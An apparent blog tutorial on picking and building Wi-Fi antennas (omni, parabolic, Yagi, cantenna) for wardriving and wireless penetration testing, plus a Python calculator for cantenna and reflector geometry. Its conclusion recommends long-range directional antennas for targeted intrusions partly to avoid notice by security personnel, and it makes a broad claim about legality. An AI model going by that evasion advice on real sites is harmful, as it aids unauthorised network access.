Wi-Fi operates in the 2.4 GHz radio band, and signal strength is expressed in decibels (dB). In order to follow discussions about the performance of antennas, you must familiarize yourself with the following terms:

dBm: dBm means decibel milliwatts, i.e. power expressed relative to one milliwatt. Wi-Fi network signal levels are usually measured in dBm. The values are negative because the received signal is never strong enough for the level to be positive; for instance, a 0.00 dBm signal corresponds to 0.001 watts (1 mW) of power.

-30 dBm: Maximum possible value; you are right next to the access point (within a few feet).
-67 dBm: Minimum requirement for timely packet delivery (e.g. for VoIP or video streaming).
-70 dBm: Minimum requirement for reliable packet delivery (e.g. for web surfing).
-80 dBm: Minimum requirement for maintaining a basic connection; you will experience some packet drops.
-90 dBm: Barely able to maintain a connection; SNR is low; functionality is severely impaired.
Link Quality: Simply stated, link quality is indicative of the SNR (Signal to Noise Ratio), which measures the strength of your ‘point-to-point’ or ‘point-to-multipoint’ link relative to interference. Accordingly, higher link quality implies a lower number of packet errors.

Antenna Gain: Do not be confused by this term; the antenna does not actually amplify anything. Antenna gain is a figure that reflects how efficiently your receiving antenna converts Wi-Fi radio waves arriving from a particular direction into electrical power. Antennas with a gain of 2 dBi, 5 dBi, 7 dBi, 9 dBi, 13 dBi etc. are available. A common mistake is to think that the one with the highest dBi would be the best (e.g. 13 dBi). To understand why this is a misconception, consider the following rough sketch [Figure 1]:

As evident from this figure, a higher gain (9 dBi) antenna is suitable for long horizontal ranges with the receiver and transmitter at roughly the same elevation. However, if the transmitter is placed vertically above the receiver—as on the floors of a building—then a 5 dBi antenna would be your best bet. If the transmitter is at a different elevation and at a long distance from the receiver, a 7 dBi antenna would offer you the right combination of elevation coverage and range. A 2 dBi antenna aims to cover signals equally in all directions, and is not well-suited for wireless penetration testing or wardriving.

How well do these antennas work?

The short answer is: if correctly chosen, they perform well. The right type of antenna, with proper orientation, is able to pick up signals from miles away. However, it is imperative to point out that many users who purchase external antennas end up dissatisfied with their performance. The reasons for this are:

Unrealistic expectations: This may seem obvious, but these antennas are not magical devices that will pick up signals from great distances, especially when they are improperly chosen (wrong type of antenna) or have not been aligned well.
Insufficient knowledge: If you are purchasing a wireless antenna, or constructing a custom one, you should be able to define your purpose and have the knowledge to choose the proper antenna that would satisfy this purpose.

To test how well an external antenna performs compared with a laptop’s default antenna under the same conditions, we set up the following experiment. The distance between the access point and our antennas was carefully chosen so that the internal antenna could barely receive a signal at this point.

Interfaces: ‘wlan0’ - internal antenna; ‘wlan1’ - external antenna, omnidirectional, 5 dBi
Distance between AP and antennas: 7.62 meters or 25 feet
Obstructions: Two concrete walls and two trees

We noticed that at this distance, using the internal antenna, we were barely able to ping the wireless router at 192.168.0.1. As evident from the round-trip delay time of several milliseconds [Figure 2], the internal antenna was performing poorly and there were multiple packet drops. At the same distance, our standard 5 dBi omnidirectional external antenna was able to outperform the internal antenna, as evident from the decreased round-trip delay time [Figure 3].

Let us examine the performance of both antennas in terms of link quality and signal levels. For the internal antenna, both the link quality and the signal level were extremely poor [Figure 4]. We were able to obtain a reliable connection using the external antenna under the same conditions [Figure 5].

These results indicate that there is a definite performance boost when an external antenna is used—how significant this boost is depends on the suitability of the antenna for the receiving conditions. This brings us to the next section.

Choosing the Right Type of Antenna

There are a variety of antenna types, and each type is built with specific needs in mind. There is no “best antenna for wardriving or penetration testing”.
Understanding the design and purpose of each of these will help you choose the best one. An omnidirectional antenna spreads energy equally in all directions—which means shorter range. A directional antenna is able to take this same energy and focus it in a particular direction—implying longer range in that direction.

Omni-Directional Antennas

This is the most common antenna type, and most if not all of you have seen one up close. For instance, the antenna on top of your car is an omnidirectional antenna. These can be used for ‘point-to-multipoint’ purposes, such as serving as the wireless router antenna that transmits signals to all devices in the vicinity [Figure 6]. They are not suitable for point-to-point communications, because transmitting signals in all directions when you want them to go from point A to point B is an inefficient choice.

Suitability for wardriving: These are ideally suited for wardriving, since they grab signals from all directions while you are driving. However, there are some considerations: a 9 dBi omnidirectional antenna would allow you to capture far off signals from all directions, but it will miss access points in high buildings close to your vehicle. To understand why, see Figure 1. Accordingly, it is advised that you choose the omnidirectional antenna with the dBi suited to the areas you are going to drive in.

Suitability for penetration testing: During a penetration test, you are aware of your target. Hence, a directional antenna pointed toward the target is more efficient than an omnidirectional antenna. However, you can use a 5 dBi omnidirectional antenna during perimeter testing.

Parabolic Antennas

Parabolic antennas depend on a curved parabolic dish that focuses signals towards a central point [Figure 7]. This enables these antennas to achieve incredible gains.
However, parabolic antennas are highly directional, which means you need to ensure that they are pointed in the right direction; otherwise they might completely “shield” the signal. Because of their high gain, they are suitable for long range point-to-point communications.

Suitability for wardriving: A parabolic antenna would pick up wireless signals from miles away, but only from a single direction at a time. Hence, if you want to map Wi-Fi access points in multiple directions while driving, this is not the best choice.

Suitability for penetration testing: Given their long range, parabolic antennas can be very suitable for targeted wireless intrusions, since they allow you to carry out tests from far away once you have positioned them toward the target access points.

Yagi Antennas

Yagi antennas, named after Dr. Hidetsugu Yagi, have a central beam with many individual elements supported by this beam [Figure 8]. These elements constitute radiators and reflectors. A variation is the ‘Vagi’ antenna, which consists of two beams side by side.

Suitability for wardriving: Yagi antennas are directional, which means they are not the best choice during wardriving. They would pick up far off signals from a particular direction, while missing out on signals in the other directions.

Suitability for penetration testing: Like parabolic antennas, Yagi antennas are capable of picking up signals from miles away. Their high gain (e.g. 25 dBi) makes them ideal for penetration testing when you have them pointed towards the target. The Vagi antenna is an attractive choice for penetration testing since it is small and lightweight, yet offers substantial gain.

Backfire antennas

Backfire antennas are known for their small size but significant gain. This makes them a very attractive choice for point-to-point or point-to-multipoint communications. How do they differ from parabolic antennas? There is no parabola; the reflector surface is flat.
Their resonant cavity structural design makes them capable of achieving the high gain. For suitability toward wardriving and penetration testing, see ‘Parabolic Antennas’.

Building Your Own High Gain Antenna

If you have followed this discussion on antennas so far, building your own antenna can be a fun exercise. For this, you will need:

- About 1-2 inches of 12 gauge copper wire, or an omnidirectional antenna
- A smooth metallic parabolic reflector such as aluminum foil, a can, an 8 inch dumpling strainer, etc.

How to Make a Cantenna

Cantennas, antennas made out of cans, have been very popular among enthusiasts since they are easy to make and everything you need is in your home. The idea is to use a ‘Pringles’ or similar can, and introduce a copper wire through the side of the can near the bottom [Figure 9]. Calculations regarding the placement of the copper wire need to be precise; use a cantenna calculator to ensure accuracy. However, if the can is very narrow, you would need to point this antenna very precisely towards the signal direction, and even then you would not notice significant gain. Moreover, if you are using a long cable, the signal will suffer attenuation.

Note: Although a Pringles can is often mentioned, it is not a good can for these purposes since it is too narrow. In fact, any cantenna is a bad choice for serious penetration testing.

How to Make a Parabolic Antenna

If you have an omnidirectional antenna available [Figure 6], the task becomes easier. Now, all you need to do is find a parabolic reflector that can “turn” this omnidirectional antenna into a parabolic antenna. This parabolic reflector can be any smooth metallic surface that converges radio signals onto the omnidirectional antenna—and this is what improves the antenna gain [Figure 10]. Accurate placement of the omnidirectional antenna in front of the parabolic reflector is of prime significance.
There is no increase in antenna gain if the omnidirectional antenna has been placed too far from or too close to the parabolic reflector so that it completely misses the focal point. Hence, for accuracy, use a parabolic antenna focal point calculator. Alternatively, if you prefer to avoid making calculations, you can use freely available parabolic reflector templates which have been drawn to scale. These templates explicitly mark the focal point of the parabolic reflector so that you do not have to make calculations. For instance, you can print and use the parabolic reflector template in Figure 11. You would need a square sheet of reflective material that you can place vertically on the straight line drawn in this template, and bend the sheet until it follows the parabolic curve in the template. Notice the marked focal point (black spot) in the template; place the omnidirectional antenna at that point.

Note: We have discussed making parabolic reflectors; however, if you want to build a 2.4 GHz omnidirectional antenna from scratch, it can get quite convoluted. Guides for building such an omnidirectional antenna are available online.

Comparison to Commercial Antennas

These homemade antennas are capable of giving you results as good as commercial antennas. However, you need to be accurate while building them. Imprecise measurements, design flaws, or implementation errors would result in inefficient antennas with no significant gain.

Turning Your Laptop’s Internal Antenna into an External Antenna

In case you have some 5 or 7 dBi antennas from your old wireless router lying around [Figure 6], and you want to avoid purchasing a USB antenna unit, you can attach these to your laptop’s built-in internal antenna unit.
For this, you will need:

- U.FL male to RP-SMA pigtail cable
- Knowledge of laptop disassembly and assembly, and the relevant tools
- Any 2.4 GHz antenna [Figure 6]

You would need to disassemble your laptop using the required tools and locate the auxiliary antenna connector on the motherboard [Figure 12]. The U.FL side of the cable fits into this auxiliary connector, and the other side should be fixed along the laptop’s edge such that you can attach your 2.4 GHz external antenna to this SMA (SubMiniature version A) end.

Detriments to Wireless Signals

Even with the right type of antenna, you may experience weak connections characterized by frequent packet drops and delays. In these situations, one or more of these factors may be the cause:

Distance: The most obvious reason is that you are too far from the transmitter. Signals are attenuated over long distances, especially when omnidirectional transmitters are being used, such as those in common wireless routers.

Weather: If an efficient transmitting antenna is being used at the right frequency, weather has little effect on wireless signals. However, rain can absorb radio energy and weaken Wi-Fi signals at 2.4 GHz.

Objects in path: Signals at 2.4 GHz need a clear ‘line-of-sight’ for efficient propagation. This means that trees and walls act as obstructions to the wireless signal.

Other access points: If there are other APs in the vicinity working on the same channel in crowded areas, this causes substantial disturbance.

Conclusion

Wardriving is not illegal as long as you are aware of your limits and avoid nefarious activities such as cracking encryption, retrieving access point passwords, and accessing the Internet for free—known as piggybacking. For wardriving, you can use a 7 dBi omnidirectional antenna placed on top of your vehicle using a magnetic mount.
For wireless penetration testing scenarios in which you want to breach the security of a particular establishment, it is best to use parabolic reflectors pointed towards the target. Depending on the conditions, these parabolic antennas would allow you to carry out wireless penetration tests from a long distance, which lowers the risk of being noticed by security personnel. Furthermore, using high gain directional antennas, you are able to ascertain how close to the target perimeter potential attackers would need to be in order to intrude on wireless communications. A 5 or 7 dBi omnidirectional antenna can be used while testing premises for the presence of rogue access points.

Source
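The cantenna and parabolic-reflector sections above defer the geometry to online calculators; the following added example (not code from the original post) implements the textbook formulas those calculators use, so the "too narrow" verdict on a Pringles-sized can and the focal-point placement for a dish can be checked directly. The channel-6 frequency, the 76 mm and 90 mm can diameters and the 200 mm dish are constructed sample values.

```python
"""Cantenna and parabolic-reflector geometry for the two build sections above.

Assumed textbook formulas (the calculators the article points to use the same):
  lambda0  = c / f                                      free-space wavelength
  lambda_c = 1.706 * D                                  TE11 cutoff of a round can
  lambda_g = lambda0 / sqrt(1 - (lambda0 / lambda_c)^2) guide wavelength
  probe sits lambda_g / 4 from the closed end and is about lambda0 / 4 long
  f = D^2 / (16 * depth)                                focal length of a dish
"""
import math

C_M_PER_S = 299_792_458.0
WIFI_CHANNEL_6_HZ = 2.437e9  # centre frequency of 2.4 GHz channel 6 (assumed)


def wavelength_mm(freq_hz: float = WIFI_CHANNEL_6_HZ) -> float:
    return C_M_PER_S / freq_hz * 1000.0


def cantenna_dimensions(diameter_mm: float, freq_hz: float = WIFI_CHANNEL_6_HZ) -> dict:
    """Probe placement for a can of the given inner diameter.

    Raises ValueError when the can is narrower than the TE11 cutoff, i.e. it cannot
    carry 2.4 GHz at all. A Pringles-sized can sits just above cutoff, so the guide
    wavelength balloons and the can would have to be impractically long."""
    lam0 = wavelength_mm(freq_hz)
    lam_c = 1.706 * diameter_mm
    if lam0 >= lam_c:
        raise ValueError(
            f"{diameter_mm} mm is below cutoff; need more than {lam0 / 1.706:.1f} mm")
    lam_g = lam0 / math.sqrt(1.0 - (lam0 / lam_c) ** 2)
    return {
        "guide_wavelength_mm": lam_g,
        "probe_offset_mm": lam_g / 4.0,     # from the closed end of the can
        "probe_length_mm": lam0 / 4.0,
        "min_can_length_mm": 0.75 * lam_g,  # hobbyist rule of thumb (assumed)
        # single-mode operation: lambda0 must also exceed the TM01 cutoff, 1.306 * D
        "single_mode": lam0 > 1.306 * diameter_mm,
    }


def focal_length_mm(diameter_mm: float, depth_mm: float) -> float:
    """Focal length of a paraboloid with the given rim diameter and depth."""
    return diameter_mm ** 2 / (16.0 * depth_mm)


def parabola_template(focal_mm: float, width_mm: float, step_mm: float = 10.0) -> list:
    """(x, y) points of y = x^2 / (4f) across the width, for drawing a template.
    The focus, where the omnidirectional element goes, is at (0, focal_mm)."""
    half = width_mm / 2.0
    xs = [-half + i * step_mm for i in range(int(width_mm / step_mm) + 1)]
    return [(x, x * x / (4.0 * focal_mm)) for x in xs]


if __name__ == "__main__":
    # constructed sample cans: Pringles-sized (~76 mm) versus a 90 mm coffee can
    for label, d in (("Pringles-sized can", 76.0), ("90 mm coffee can", 90.0)):
        dims = cantenna_dimensions(d)
        print(f"{label}: probe {dims['probe_offset_mm']:.1f} mm from the base, "
              f"can at least {dims['min_can_length_mm']:.0f} mm long")
    f = focal_length_mm(200.0, 50.0)
    print(f"200 mm dish, 50 mm deep: focus {f:.1f} mm in front of the vertex")
```

The 90 mm can needs its probe about 51 mm from the base and a length around 154 mm, while the 76 mm can needs the probe nearly 100 mm up and a can roughly 290 mm long, which is the narrow-can problem the article warns about.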